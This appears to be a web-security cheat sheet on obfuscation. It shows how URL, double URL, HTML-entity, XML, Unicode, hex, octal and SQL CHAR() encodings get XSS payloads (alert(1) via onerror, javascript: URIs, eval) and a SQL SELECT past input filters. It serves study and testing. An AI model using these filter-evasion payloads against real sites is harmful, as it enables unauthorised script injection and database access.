# Obfuscation

<figure><img src="https://2314265932-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FLZ9hPT4FtAP57VrTApYv%2Fuploads%2FhsD7xghrs2lQKH0k6DQ4%2FPasted%20image%2020221130095515.png?alt=media&#x26;token=9ba2eaaa-c8ea-4a6b-b581-7e6599597d9b" alt=""><figcaption></figcaption></figure>

**URL encoding:**

```bash
[...]/?search=Fish+%26+Chips
```

**Double URL encoding:**

```bash
[...]/?search=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E
[...]/?search=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E
```

**HTML encoding:**

```html
<img src=x onerror="&#x61;lert(1)">
<a href="javascript&#00000000000058;alert(1)">Click me</a>
```

**XML encoding:**

```xml
<stockCheck>
    <productId>
        123
    </productId>
    <storeId>
        999 &#x53;ELECT * FROM information_schema.tables
    </storeId>
</stockCheck>
```

**Unicode encoding:**

```js
eval("\u0061lert(1)")
<a href="javascript\u{0000000003a}alert(1)">Click me</a>
```

**Hex escaping:**

```js
eval("\x61lert")
```

**Octal escaping:**

```js
eval("\141lert(1)")
```

**Multiple encodings:**

```js
<a href="javascript:&bsol;u0061lert(1)">Click me</a>
```

Browser will first HTML decode `&bsol;` to `\` - turning `u0061` into the unicode escape `\u0061` decoding into `a`.

**SQL char() function:**

```sql
CHAR(83)+CHAR(69)+CHAR(76)+CHAR(69)+CHAR(67)+CHAR(84)
```

Decoded to `SELECT`